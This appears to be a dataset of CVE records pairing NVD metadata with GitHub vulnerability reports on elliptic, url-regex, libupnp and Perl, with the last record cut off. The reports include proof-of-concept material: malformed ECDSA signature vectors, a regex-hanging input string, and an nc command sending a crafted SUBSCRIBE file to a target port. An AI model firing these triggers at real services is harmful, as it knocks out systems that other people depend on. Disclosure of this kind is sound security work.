Hello, Using elliptic 6.5.2 I've found that the ECDSA verification functionality validates signatures as 'true' when the encoding is incorrect i.e. it has been modified / altered against the standard, allowing a certain degree of malleability in the signatures. Based on the Google Wycheproof test vectors, the following changes on an ECDSA signature are not detected: - "long form encoding of length of sequence", - "length of sequence contains leading 0", - "length of integer contains leading 0", - "uint32 overflow in length of integer", - "uint64 overflow in length of integer", - "prepending 0's to integer", - "long form encoding of length of integer" See the proof of concept and test vectors below: ``` // ECDSA test var crypto = require('crypto') var EC = require('elliptic').ec; var ec = new EC('secp256k1'); var obj = require("./poc_ecdsa_secp256k1_sha256_test.json"); for (let testGroup of obj.testGroups) { var key = ec.keyFromPublic(testGroup.key.uncompressed, 'hex'); for(let test of testGroup.tests) { console.log("[*] Test " + test.tcId + " result: " + test.result) msgHash = crypto.createHash('sha256').update(Buffer.from(test.msg, 'hex')).digest(); try { result = key.verify(msgHash, Buffer.from(test.sig, 'hex')); if (result == true) { if (test.result == "valid" || test.result == "acceptable") console.log("Result: PASS"); else console.log("Result: FAIL") } if (result == false) { if (test.result == "valid" || test.result == "acceptable") console.log("Result: FAIL"); else console.log("Result: PASS") } } catch (e) { console.log("ERROR - VERIFY: " + e) if (test.result == "valid" || test.result == "acceptable") console.log("Result: FAIL"); else console.log("Result: PASS") } } } ``` Test vectors: ``` { "algorithm" : "ECDSA", "generatorVersion" : "0.8r12", "numberOfTests" : 380, "header" : [ "Test vectors of type EcdsaVerify are meant for the verification", "of ASN encoded ECDSA signatures." ], "notes" : { "BER" : "This is a signature with correct values for (r, s) but using some alternative BER encoding instead of DER encoding. Implementations should not accept such signatures to limit signature malleability.", "EdgeCase" : "Edge case values such as r=1 and s=0 can lead to forgeries if the ECDSA implementation does not check boundaries and computes s^(-1)==0.", "MissingZero" : "Some implementations of ECDSA and DSA incorrectly encode r and s by not including leading zeros in the ASN encoding of integers when necessary. Hence, some implementations (e.g. jdk) allow signatures with incorrect ASN encodings assuming that the signature is otherwise valid.", "PointDuplication" : "Some implementations of ECDSA do not handle duplication and points at infinity correctly. This is a test vector that has been specially crafted to check for such an omission." }, "schema" : "ecdsa_verify_schema.json", "testGroups" : [ { "key" : { "curve" : "secp256k1", "keySize" : 256, "type" : "EcPublicKey", "uncompressed" : "04b838ff44e5bc177bf21189d0766082fc9d843226887fc9760371100b7ee20a6ff0c9d75bfba7b31a6bca1974496eeb56de357071955d83c4b1badaa0b21832e9", "wx" : "00b838ff44e5bc177bf21189d0766082fc9d843226887fc9760371100b7ee20a6f", "wy" : "00f0c9d75bfba7b31a6bca1974496eeb56de357071955d83c4b1badaa0b21832e9" }, "keyDer" : "3056301006072a8648ce3d020106052b8104000a03420004b838ff44e5bc177bf21189d0766082fc9d843226887fc9760371100b7ee20a6ff0c9d75bfba7b31a6bca1974496eeb56de357071955d83c4b1badaa0b21832e9", "keyPem" : "-----BEGIN PUBLIC KEY-----\nMFYwEAYHKoZIzj0CAQYFK4EEAAoDQgAEuDj/ROW8F3vyEYnQdmCC/J2EMiaIf8l2\nA3EQC37iCm/wyddb+6ezGmvKGXRJbutW3jVwcZVdg8Sxutqgshgy6Q==\n-----END PUBLIC KEY-----", "sha" : "SHA-256", "type" : "EcdsaVerify", "tests" : [ { "tcId" : 4, "comment" : "long form encoding of length of sequence", "msg" : "313233343030", "sig" : "308145022100813ef79ccefa9a56f7ba805f0e478584fe5f0dd5f567bc09b5123ccbc983236502206ff18a52dcc0336f7af62400a6dd9b810732baf1ff758000d6f613a556eb31ba", "result" : "invalid", "flags" : [ "BER" ] }, { "tcId" : 5, "comment" : "length of sequence contains leading 0", "msg" : "313233343030", "sig" : "30820045022100813ef79ccefa9a56f7ba805f0e478584fe5f0dd5f567bc09b5123ccbc983236502206ff18a52dcc0336f7af62400a6dd9b810732baf1ff758000d6f613a556eb31ba", "result" : "invalid", "flags" : [ "BER" ] }, { "tcId" : 8, "comment" : "uint32 overflow in length of sequence", "msg" : "313233343030", "sig" : "30850100000045022100813ef79ccefa9a56f7ba805f0e478584fe5f0dd5f567bc09b5123ccbc983236502206ff18a52dcc0336f7af62400a6dd9b810732baf1ff758000d6f613a556eb31ba", "result" : "invalid", "flags" : [] }, { "tcId" : 9, "comment" : "uint64 overflow in length of sequence", "msg" : "313233343030", "sig" : "3089010000000000000045022100813ef79ccefa9a56f7ba805f0e478584fe5f0dd5f567bc09b5123ccbc983236502206ff18a52dcc0336f7af62400a6dd9b810732baf1ff758000d6f613a556eb31ba", "result" : "invalid", "flags" : [] }, { "tcId" : 68, "comment" : "long form encoding of length of integer", "msg" : "313233343030", "sig" : "304602812100813ef79ccefa9a56f7ba805f0e478584fe5f0dd5f567bc09b5123ccbc983236502206ff18a52dcc0336f7af62400a6dd9b810732baf1ff758000d6f613a556eb31ba", "result" : "invalid", "flags" : [ "BER" ] }, { "tcId" : 69, "comment" : "long form encoding of length of integer", "msg" : "313233343030", "sig" : "3046022100813ef79ccefa9a56f7ba805f0e478584fe5f0dd5f567bc09b5123ccbc98323650281206ff18a52dcc0336f7af62400a6dd9b810732baf1ff758000d6f613a556eb31ba", "result" : "invalid", "flags" : [ "BER" ] }, { "tcId" : 70, "comment" : "length of integer contains leading 0", "msg" : "313233343030", "sig" : "30470282002100813ef79ccefa9a56f7ba805f0e478584fe5f0dd5f567bc09b5123ccbc983236502206ff18a52dcc0336f7af62400a6dd9b810732baf1ff758000d6f613a556eb31ba", "result" : "invalid", "flags" : [ "BER" ] }, { "tcId" : 71, "comment" : "length of integer contains leading 0", "msg" : "313233343030", "sig" : "3047022100813ef79ccefa9a56f7ba805f0e478584fe5f0dd5f567bc09b5123ccbc9832365028200206ff18a52dcc0336f7af62400a6dd9b810732baf1ff758000d6f613a556eb31ba", "result" : "invalid", "flags" : [ "BER" ] }, { "tcId" : 76, "comment" : "uint32 overflow in length of integer", "msg" : "313233343030", "sig" : "304a0285010000002100813ef79ccefa9a56f7ba805f0e478584fe5f0dd5f567bc09b5123ccbc983236502206ff18a52dcc0336f7af62400a6dd9b810732baf1ff758000d6f613a556eb31ba", "result" : "invalid", "flags" : [] }, { "tcId" : 77, "comment" : "uint32 overflow in length of integer", "msg" : "313233343030", "sig" : "304a022100813ef79ccefa9a56f7ba805f0e478584fe5f0dd5f567bc09b5123ccbc9832365028501000000206ff18a52dcc0336f7af62400a6dd9b810732baf1ff758000d6f613a556eb31ba", "result" : "invalid", "flags" : [] }, { "tcId" : 78, "comment" : "uint64 overflow in length of integer", "msg" : "313233343030", "sig" : "304e028901000000000000002100813ef79ccefa9a56f7ba805f0e478584fe5f0dd5f567bc09b5123ccbc983236502206ff18a52dcc0336f7af62400a6dd9b810732baf1ff758000d6f613a556eb31ba", "result" : "invalid", "flags" : [] }, { "tcId" : 79, "comment" : "uint64 overflow in length of integer", "msg" : "313233343030", "sig" : "304e022100813ef79ccefa9a56f7ba805f0e478584fe5f0dd5f567bc09b5123ccbc983236502890100000000000000206ff18a52dcc0336f7af62400a6dd9b810732baf1ff758000d6f613a556eb31ba", "result" : "invalid", "flags" : [] }, { "tcId" : 95, "comment" : "prepending 0's to integer", "msg" : "313233343030", "sig" : "30470223000000813ef79ccefa9a56f7ba805f0e478584fe5f0dd5f567bc09b5123ccbc983236502206ff18a52dcc0336f7af62400a6dd9b810732baf1ff758000d6f613a556eb31ba", "result" : "invalid", "flags" : [ "BER" ] }, { "tcId" : 96, "comment" : "prepending 0's to integer", "msg" : "313233343030", "sig" : "3047022100813ef79ccefa9a56f7ba805f0e478584fe5f0dd5f567bc09b5123ccbc9832365022200006ff18a52dcc0336f7af62400a6dd9b810732baf1ff758000d6f613a556eb31ba", "result" : "invalid", "flags" : [ "BER" ] } ] } ] } ```
Lack of encoding checks allows a certain degree of signature malleability in ECDSA signatures
https://api.github.com/repos/indutny/elliptic/issues/226/comments
19
2020-06-01T09:49:31Z
2020-11-12T16:45:49Z
https://github.com/indutny/elliptic/issues/226
628,302,319
226
1,255
CVE-2020-7661
2020-06-04T18:15:15.013
all versions of url-regex are vulnerable to Regular Expression Denial of Service. An attacker providing a very long string in String.test can cause a Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/kevva/url-regex/issues/70" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-URLREGEX-569472" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/kevva/url-regex/issues/70" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-URLREGEX-569472" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:url-regex_project:url-regex:*:*:*:*:*:*:*:*", "matchCriteriaId": "4E568BB4-BE50-4B0C-8F38-2FF8DF24DC98", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "400" ]
400
https://github.com/kevva/url-regex/issues/70
[ "Exploit", "Third Party Advisory" ]
github.com
[ "kevva", "url-regex" ]
# IMPORTANT UPDATE (8/15/20) [Per my comment below](https://github.com/kevva/url-regex/issues/70#issuecomment-674365368), I have released my own package, `url-regex-safe`, which resolves this issue, and all (solvable) existing issues and pull requests here in this GitHub repository. The new package has 100% test coverage and is available at https://github.com/niftylettuce/url-regex-safe. It has more sensible defaults as well. --- Example: ```sh > require('url-regex')({ strict: false }).test('018137.113.215.4074.138.129.172220.179.206.94180.213.144.175250.45.147.1364868726sgdm6nohQ') ``` The only way to exit out is to SIGINT.
[VULNERABILITY] Parsing a long String will result in 100% CPU usage and `String.test` will never finish
https://api.github.com/repos/kevva/url-regex/issues/70/comments
12
2020-04-26T22:13:22Z
2020-11-24T22:00:59Z
https://github.com/kevva/url-regex/issues/70
607,126,399
70
1,256
CVE-2020-13848
2020-06-04T20:15:12.050
Portable UPnP SDK (aka libupnp) 1.12.1 and earlier allows remote attackers to cause a denial of service (crash) via a crafted SSDP message due to a NULL pointer dereference in the functions FindServiceControlURLPath and FindServiceEventURLPath in genlib/service_table/service_table.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00030.html" }, { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00033.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/pupnp/pupnp/commit/c805c1de1141cb22f74c0d94dd5664bda37398e0" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/pupnp/pupnp/issues/177" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/06/msg00006.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00007.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00030.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00033.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/pupnp/pupnp/commit/c805c1de1141cb22f74c0d94dd5664bda37398e0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/pupnp/pupnp/issues/177" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/06/msg00006.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00007.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libupnp_project:libupnp:*:*:*:*:*:*:*:*", "matchCriteriaId": "92BB7079-C245-481E-A592-D88889DC1D95", "versionEndExcluding": null, "versionEndIncluding": "1.12.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/pupnp/pupnp/issues/177
[ "Third Party Advisory" ]
github.com
[ "pupnp", "pupnp" ]
There is a NULL pointer dereference in the function FindServiceControlURLPath in genlib/service_table/service_table.c. A segmentation fault occurs if the string controlURLPath is NULL. This crash can be triggered by sending a malformed SUBSCRIBE or UNSUBSCRIBE using any of the attached files. `cat <subscribe/unsubscribe>.txt | nc <ip> 49152` With ASan enabled, this will result in the following output using subscribe.txt ``` >> AddressSanitizer:DEADLYSIGNAL ================================================================= ==1382600==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f9314e77878 bp 0x000000000002 sp 0x7f930eef98d0 T6) ==1382600==The signal is caused by a READ memory access.                                                                                                                       ==1382600==Hint: address points to the zero page.     #0 0x7f9314e77877 in FindServiceControlURLPath src/genlib/service_table/service_table.c:357     #1 0x7f9314e85b83 in GetDeviceHandleInfoForPath src/api/upnpapi.c:4246     #2 0x7f9314e7fda8 in gena_process_subscription_renewal_request src/gena/gena_device.c:1464     #3 0x7f9314e7641b in dispatch_request src/genlib/miniserver/miniserver.c:157     #4 0x7f9314e7641b in handle_request src/genlib/miniserver/miniserver.c:230     #5 0x7f9314e6ffca in WorkerThread src/threadutil/ThreadPool.c:576     #6 0x7f9314e3efb6 in start_thread /build/glibc-suXNNi/glibc-2.29/nptl/pthread_create.c:486     #7 0x7f9314d702ce in __clone (/lib/x86_64-linux-gnu/libc.so.6+0xfa2ce) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV src/genlib/service_table/service_table.c:357 in FindServiceControlURLPath Thread T6 created by T0 here:     #0 0x7f9314ed09b2 in pthread_create (/lib/x86_64-linux-gnu/libasan.so.5+0x399b2)     #1 0x7f9314e6f97b in CreateWorker src/threadutil/ThreadPool.c:651 ==1382600==ABORTING ``` and using unsubscribe.txt ``` >> AddressSanitizer:DEADLYSIGNAL ================================================================= ==1382441==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f0c2ac29878 bp 0x000000000002 sp 0x7f0c23cf78e0 T8) ==1382441==The signal is caused by a READ memory access.                                                                                                                       ==1382441==Hint: address points to the zero page.     #0 0x7f0c2ac29877 in FindServiceControlURLPath src/genlib/service_table/service_table.c:357     #1 0x7f0c2ac37b83 in GetDeviceHandleInfoForPath src/api/upnpapi.c:4246     #2 0x7f0c2ac32001 in gena_process_unsubscribe_request src/gena/gena_device.c:1577     #3 0x7f0c2ac2841b in dispatch_request src/genlib/miniserver/miniserver.c:157     #4 0x7f0c2ac2841b in handle_request src/genlib/miniserver/miniserver.c:230     #5 0x7f0c2ac21fca in WorkerThread src/threadutil/ThreadPool.c:576     #6 0x7f0c2abf0fb6 in start_thread /build/glibc-suXNNi/glibc-2.29/nptl/pthread_create.c:486     #7 0x7f0c2ab222ce in __clone (/lib/x86_64-linux-gnu/libc.so.6+0xfa2ce) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV src/genlib/service_table/service_table.c:357 in FindServiceControlURLPath Thread T8 created by T0 here:     #0 0x7f0c2ac829b2 in pthread_create (/lib/x86_64-linux-gnu/libasan.so.5+0x399b2)     #1 0x7f0c2ac2197b in CreateWorker src/threadutil/ThreadPool.c:651 ==1382441==ABORTING ``` This was tested on the current master branch and on release 1.6.6. Earlier versions may also be affected. [subscribe.txt](https://github.com/pupnp/pupnp/files/4715990/subscribe.txt) [unsubscribe.txt](https://github.com/pupnp/pupnp/files/4715991/unsubscribe.txt)
NULL pointer dereference in FindServiceControlURLPath
https://api.github.com/repos/pupnp/pupnp/issues/177/comments
4
2020-06-02T08:54:59Z
2020-06-05T15:04:55Z
https://github.com/pupnp/pupnp/issues/177
629,026,044
177
1,257
CVE-2020-12723
2020-06-05T15:15:10.800
regcomp.c in Perl before 5.30.3 allows a buffer overflow via a crafted regular expression because of recursive S_study_chunk calls.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00044.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Perl/perl5/blob/blead/pod/perl5303delta.pod" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Perl/perl5/compare/v5.30.2...v5.30.3" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Perl/perl5/issues/16947" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Perl/perl5/issues/17743" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/perl/perl5/commit/66bbb51b93253a3f87d11c2695cfb7bdb782184a" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IN3TTBO5KSGWE5IRIKDJ5JSQRH7ANNXE/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202006-03" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200611-0001/" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00044.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Perl/perl5/blob/blead/pod/perl5303delta.pod" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Perl/perl5/compare/v5.30.2...v5.30.3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Perl/perl5/issues/16947" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Perl/perl5/issues/17743" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/perl/perl5/commit/66bbb51b93253a3f87d11c2695cfb7bdb782184a" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IN3TTBO5KSGWE5IRIKDJ5JSQRH7ANNXE/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202006-03" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200611-0001/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:perl:perl:*:*:*:*:*:*:*:*", "matchCriteriaId": "C171B203-3DAA-43B7-A0BE-DDB0895EB744", "versionEndExcluding": "5.30.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:oncommand_workflow_automation:-:*:*:*:*:*:*:*", "matchCriteriaId": "5735E553-9731-4AAC-BCFF-989377F817B3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:snap_creator_framework:-:*:*:*:*:*:*:*", "matchCriteriaId": "9F4754FB-E3EB-454A-AB1A-AE3835C5350C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "matchCriteriaId": "80F0FA5D-8D3B-4C0E-81E2-87998286AF33", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0.0.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "2ECD5E79-5C1B-42E9-BE0B-A034EE2D632D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0.0.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "E39D442D-1997-49AF-8B02-5640BE2A26CC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_diameter_signaling_router:*:*:*:*:*:*:*:*", "matchCriteriaId": "C88D46AF-459D-4917-9403-0F63FEC83512", "versionEndExcluding": null, "versionEndIncluding": "8.5.0", "versionStartExcluding": null, "versionStartIncluding": "8.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_eagle_application_processor:*:*:*:*:*:*:*:*", "matchCriteriaId": "1A0E3537-CB5A-40BF-B42C-CED9211B8892", "versionEndExcluding": null, "versionEndIncluding": "16.4.0", "versionStartExcluding": null, "versionStartIncluding": "16.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_eagle_lnp_application_processor:10.1:*:*:*:*:*:*:*", "matchCriteriaId": "996861FC-0089-4BED-8E46-F2B76037EA65", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_eagle_lnp_application_processor:10.2:*:*:*:*:*:*:*", "matchCriteriaId": "37764AF5-E42E-461E-AA43-763D21B3DCE2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_lsms:*:*:*:*:*:*:*:*", "matchCriteriaId": "806AF4AF-12FB-4222-84E4-BC9D44EFF09F", "versionEndExcluding": null, "versionEndIncluding": "13.4", "versionStartExcluding": null, "versionStartIncluding": "13.1", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_offline_mediation_controller:12.0.0.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "49ACFC73-A509-4D1C-8FC3-F68F495AB055", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_performance_intelligence_center:*:*:*:*:*:*:*:*", "matchCriteriaId": "977CA754-6CE0-4FCB-9683-D81B7A15449D", "versionEndExcluding": null, "versionEndIncluding": "10.3.0.2.1", "versionStartExcluding": null, "versionStartIncluding": "10.3.0.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_performance_intelligence_center:*:*:*:*:*:*:*:*", "matchCriteriaId": "29A3F7EF-2A69-427F-9F75-DDDBEE34BA2B", "versionEndExcluding": null, 